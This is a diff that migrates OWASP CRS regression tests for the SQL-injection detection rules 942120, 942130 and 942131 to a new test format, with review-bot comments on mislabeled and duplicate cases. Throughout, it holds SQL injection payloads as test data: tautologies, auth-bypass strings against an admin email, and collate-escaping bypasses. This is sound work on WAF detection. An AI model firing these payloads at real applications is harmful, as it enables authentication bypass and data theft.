"select%20*%20from%20user%20where%20password_last_changed%20not%20between%20'2021-04-11'%20and%20'2021-04-11'" + version: HTTP/1.0 + output: + log: + expect_ids: [942120] + - 
test_id: 23 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email=z'or%20email%20notnull--" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-24 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email=z'or%20email%20notnull--" + version: HTTP/1.0 + output: + log: + expect_ids: [942120] + - test_id: 24 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email=x'%20or%20username%20like%20totpSecret%20escape%20'x';" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-25 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email=x'%20or%20username%20like%20totpSecret%20escape%20'x';" + version: HTTP/1.0 + output: + log: + expect_ids: [942120] + - test_id: 25 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 
80 - uri: "/post" - data: "email=admin%40juice-sh.op'%20and%20email%20ilike%20email--" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-26 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email=admin%40juice-sh.op'%20and%20email%20ilike%20email--" + version: HTTP/1.0 + output: + log: + expect_ids: [942120] + - test_id: 26 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email=admin%40juice-sh.op'%20and%20email%20%3d%20all%20(select%20email)--" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-27 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email=admin%40juice-sh.op'%20and%20email%20%3d%20all%20(select%20email)--" + version: HTTP/1.0 + output: + log: + expect_ids: [942120] + - test_id: 27 desc: "SQLite collate nocase" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=user'collate%20nocase--" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-28 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=user'collate%20nocase--" + version: HTTP/1.0 + output: + log: + expect_ids: [942120] + - test_id: 28 desc: "SQLite collate nocase" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=user'collate%20nocase--" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-29 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=user'collate%20nocase--" + version: HTTP/1.0 + output: + log: + expect_ids: [942120] + - test_id: 29 desc: "SQL collate`nocase`" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=user'collate%60nocase%60--" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-30 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=user'collate%60nocase%60--" + version: HTTP/1.0 + output: + log: + expect_ids: [942120] + - test_id: 30 desc: "Invalid SQL collate foo" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=user'collate%20foo--" - version: HTTP/1.0 - output: - no_log_contains: id "942120" - - test_title: 942120-31 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=user'collate%20foo--" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942120] + - test_id: 31 desc: "Invalid SQL collate foo" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - # collate`utf8mb4_general_ci` - data: "var=user'collate%60utf8mb4_general_ci%60--" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-32 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + # collate`utf8mb4_general_ci` + data: "var=user'collate%60utf8mb4_general_ci%60--" + version: HTTP/1.0 + output: + log: + expect_ids: [942120] + - test_id: 32 desc: "Collate bypass with character escaping" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - # collate"\utf8mb4_general_ci" - data: "var=user'collate%22%5Cutf8mb4_general_ci%22--" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-33 + 
- input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + # collate"\utf8mb4_general_ci" + data: "var=user'collate%22%5Cutf8mb4_general_ci%22--" + version: HTTP/1.0 + output: + log: + expect_ids: [942120] + - test_id: 33 desc: "Collate bypass with postgress string escaping U&" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - # collate U&"\0441\043B\043E\043D" - data: "var=user'collate U%26%22%241%23B%23E%23D%22--" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-34 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + # collate U&"\0441\043B\043E\043D" + data: "var=user'collate U%26%22%241%23B%23E%23D%22--" + version: HTTP/1.0 + output: + log: + expect_ids: [942120] + - test_id: 34 desc: "Detect auth bypass email=' notnull --" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email=%27%20notnull%20--" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-35 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + 
port: 80 + uri: "/post" + data: "email=%27%20notnull%20--" + version: HTTP/1.0 + output: + log: + expect_ids: [942120] + - test_id: 35 desc: "Test for IJ5N1CXB - unlikely" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email=admin%40juice-sh.op'and%20unlikely%20(id)--" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-36 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email=admin%40juice-sh.op'and%20unlikely%20(id)--" + version: HTTP/1.0 + output: + log: + expect_ids: [942120] + - test_id: 36 desc: "Negative test for IJ5N1CXB - unlikely" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: - text=It is highly unlikely this is going to be a false positive - version: HTTP/1.0 - output: - no_log_contains: id "942120" - - test_title: 942120-37 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: text=It is highly unlikely this is going to be a false positive + version: HTTP/1.0 + output: + log: + no_expect_ids: [942120] + - test_id: 37 desc: "Test for HOH7M88Q - likelihood" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test 
agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: | - email=admin%40juice-sh.op\'%20and(%20likelihood%20(id,.0));' - version: HTTP/1.1 - output: - log_contains: id "942120" - - test_title: 942120-38 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: | + email=admin%40juice-sh.op\'%20and(%20likelihood%20(id,.0));' + version: HTTP/1.1 + output: + log: + expect_ids: [942120] + - test_id: 38 desc: "Negative test for HOH7M88Q - likelihood" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: | - text=After calculating the likelihood this should not be matched. - version: HTTP/1.1 - output: - no_log_contains: id "942120" - - test_title: 942120-39 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: | + text=After calculating the likelihood this should not be matched. 
+ version: HTTP/1.1 + output: + log: + no_expect_ids: [942120] + - test_id: 39 desc: "Detect path-based SQLi attempt" stages: - - stage: - input: - dest_addr: 127.0.0.1 - port: 80 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: "*/*" - method: POST - uri: "/post/catalogue/rest/products/2499999||this.product/reviews" - version: HTTP/1.0 - output: - log_contains: id "942120" + - input: + dest_addr: 127.0.0.1 + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: "*/*" + method: POST + uri: "/post/catalogue/rest/products/2499999||this.product/reviews" + version: HTTP/1.0 + output: + log: + expect_ids: [942120] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942130.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942130.yaml index 594e372cf..c4d4e9983 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942130.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942130.yaml 
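Review bot: Test 31's `desc: "Invalid SQL collate foo"` no longer matches its body: the payload is the backtick-quoted `utf8mb4_general_ci` collation and the expectation is a positive match (`expect_ids: [942120]`), so the description looks copied from test 30, which is the actual negative case. Consider `desc: "SQL collate with backtick-quoted collation name"` so a failing run reports what the case covers. Separately, test 28 is a byte-for-byte duplicate of test 27 (same desc, same `var=user'collate%20nocase--` payload, same expectation); since this migration renumbers every test anyway, it is a natural moment to drop it or give it a distinct payload. Both issues predate this commit, but the hunk rewrites every line of the file, so fixing them here costs nothing.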
@@ -1,160 +1,158 @@
 ---
 meta:
 author: "Christian S.J. Peron and Allan Boll, Franziska Bühler, azurit"
- description: None
- enabled: true
- name: 942130.yaml
+rule_id: 942130
 tests:
- - test_title: 942130-1
+ - test_id: 1
 desc: "SQL Injection Attack: SQL Tautology"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: POST
- port: 80
- uri: "/post"
- data: "var=%221%22%20sSOUNDS%20LIKE%20%22SOUNDS%20LIKE%201&other_var=test"
- version: HTTP/1.0
- output:
- no_log_contains: id "942130"
- - test_title: 942130-2
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "var=%221%22%20sSOUNDS%20LIKE%20%22SOUNDS%20LIKE%201&other_var=test"
+ version: HTTP/1.0
+ output:
+ log:
+ no_expect_ids: [942130]
+ - test_id: 2
 desc: "SQL Injection Attack: SQL Tautology"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: GET
- uri: "/get?a=1=1"
- version: HTTP/1.1
- output:
- log_contains: id "942130"
- - test_title: 942130-3
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: GET
+ uri: "/get?a=1=1"
+ version: HTTP/1.1
+ output:
+ log:
+ expect_ids: [942130]
+ - test_id: 3
 desc: "SQL Injection Attack: SQL Tautology"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: GET
- uri: "/get?a=11=1"
- version: HTTP/1.1
- output:
- no_log_contains: id "942130"
- - test_title: 942130-4
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: GET
+ uri: "/get?a=11=1"
+ version: HTTP/1.1
+ output:
+ log:
+ no_expect_ids: [942130]
+ - test_id: 4
 desc: "SQL Injection Attack: SQL Tautology"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: GET
- uri: "/get?a=1=11"
- version: HTTP/1.1
- output:
- no_log_contains: id "942130"
- - test_title: 942130-5
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: GET
+ uri: "/get?a=1=11"
+ version: HTTP/1.1
+ output:
+ log:
+ no_expect_ids: [942130]
+ - test_id: 5
 desc: "SQL Injection Attack: SQL Tautology"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: GET
- uri: "/get?a=11!=11"
- version: HTTP/1.1
- output:
- no_log_contains: id "942130"
- - test_title: 942130-6
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: GET
+ uri: "/get?a=11!=11"
+ version: HTTP/1.1
+ output:
+ log:
+ no_expect_ids: [942130]
+ - test_id: 6
 desc: "SQL Injection Attack: SQL Tautology"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: GET
- uri: "/get?a=b,1=1"
- version: HTTP/1.1
- output:
- log_contains: id "942130"
- - test_title: 942130-7
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: GET
+ uri: "/get?a=b,1=1"
+ version: HTTP/1.1
+ output:
+ log:
+ expect_ids: [942130]
+ - test_id: 7
 desc: "SQL Injection Attack: SQL Tautology - like"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: POST
- uri: "/post"
- data: "a=42%20like%2042"
- version: HTTP/1.1
- output:
- log_contains: id "942130"
- - test_title: 942130-8
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ uri: "/post"
+ data: "a=42%20like%2042"
+ version: HTTP/1.1
+ output:
+ log:
+ expect_ids: [942130]
+ - test_id: 8
 desc: "SQL Injection Attack: SQL Tautology"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: GET
- uri: "/get?a=This%20is%20like%20no%20other"
- version: HTTP/1.1
- output:
- no_log_contains: id "942130"
- - test_title: 942130-9
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: GET
+ uri: "/get?a=This%20is%20like%20no%20other"
+ version: HTTP/1.1
+ output:
+ log:
+ no_expect_ids: [942130]
+ - test_id: 9
 desc: "SQL Injection Attack: SQL Tautology using MySQL NULL-safe operator <=>"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: GET
- uri: "/get?a=42<=>42"
- version: HTTP/1.1
- output:
- log_contains: id "942130"
- - test_title: 942130-10
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: GET
+ uri: "/get?a=42<=>42"
+ version: HTTP/1.1
+ output:
+ log:
+ expect_ids: [942130]
+ - test_id: 10
 desc: "SQL Injection Attack: SQL Tautology using glob"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: GET
- uri: "/get?user=admin%40juice-sh.op'%20and%20password%20glob%20password;"
- version: HTTP/1.1
- output:
- log_contains: id "942130"
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: GET
+ uri: "/get?user=admin%40juice-sh.op'%20and%20password%20glob%20password;"
+ version: HTTP/1.1
+ output:
+ log:
+ expect_ids: [942130]
diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942131.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942131.yaml
index 934a8ac84..37712c37d 100644
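Review bot: Tests 1, 3, 4, 5 and 8 in this hunk are false-positive checks (`no_expect_ids: [942130]`) yet carry the same `desc: "SQL Injection Attack: SQL Tautology"` as the positive tests 2 and 6, so a reader of a failing run cannot tell from the description whether a match or a non-match was expected. Since the format migration touches every test entry anyway, the negative cases would benefit from a description that states their intent, e.g. for test 3 `desc: "SQL Injection Attack: SQL Tautology - negative, 11=1 must not match"`. The 942131 hunk below already labels one of its negative tests "SQL Tautology negative" but not tests 3 and 7, and the 942140 hunk uses one identical description for all 17 cases including the mixed-case variants; the same treatment applies there. Note also that `no_expect_ids` checks the parsed rule id where the old `no_log_contains: id "942130"` was a plain substring match; that should be equivalent, but the negative tests are the ones that would silently pass if go-ftw's log parsing missed an entry, so worth confirming against a run with the pinned go-ftw version.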
--- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942131.yaml
+++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942131.yaml
@@ -2,113 +2,112 @@
 meta:
 author: "Felipe Zipitria"
 description: SQL Tautology
- enabled: true
- name: 942131.yaml
+rule_id: 942131
 tests:
- - test_title: 942131-1
+ - test_id: 1
 desc: "SQL Injection Attack: SQL Tautology"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: GET
- uri: "/get?a=11!=1"
- version: HTTP/1.1
- output:
- log_contains: id "942131"
- - test_title: 942131-2
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: GET
+ uri: "/get?a=11!=1"
+ version: HTTP/1.1
+ output:
+ log:
+ expect_ids: [942131]
+ - test_id: 2
 desc: "SQL Injection Attack: SQL Tautology"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: GET
- uri: "/get?a=1!=11"
- version: HTTP/1.1
- output:
- log_contains: id "942131"
- - test_title: 942131-3
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: GET
+ uri: "/get?a=1!=11"
+ version: HTTP/1.1
+ output:
+ log:
+ expect_ids: [942131]
+ - test_id: 3
 desc: "SQL Injection Attack: SQL Tautology"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: GET
- uri: "/get?a=11!=11"
- version: HTTP/1.1
- output:
- no_log_contains: id "942131"
- - test_title: 942131-4
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: GET
+ uri: "/get?a=11!=11"
+ version: HTTP/1.1
+ output:
+ log:
+ no_expect_ids: [942131]
+ - test_id: 4
 desc: "SQL Injection Attack: SQL Tautology"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: GET
- uri: "/get?a=1%20is%20not%202"
- version: HTTP/1.1
- output:
- log_contains: id "942131"
- - test_title: 942131-5
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: GET
+ uri: "/get?a=1%20is%20not%202"
+ version: HTTP/1.1
+ output:
+ log:
+ expect_ids: [942131]
+ - test_id: 5
 desc: "SQL Injection Attack: SQL Tautology negative"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: GET
- uri: "/get?a=1%20is%20not%201"
- version: HTTP/1.1
- output:
- no_log_contains: id "942131"
- - test_title: 942131-6
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: GET
+ uri: "/get?a=1%20is%20not%201"
+ version: HTTP/1.1
+ output:
+ log:
+ no_expect_ids: [942131]
+ - test_id: 6
 desc: "SQL Injection Attack: SQL Tautology"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: POST
- uri: "/post"
- data: "a='1' not regexp '2'"
- version: HTTP/1.1
- output:
- log_contains: id "942131"
- - test_title: 942131-7
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
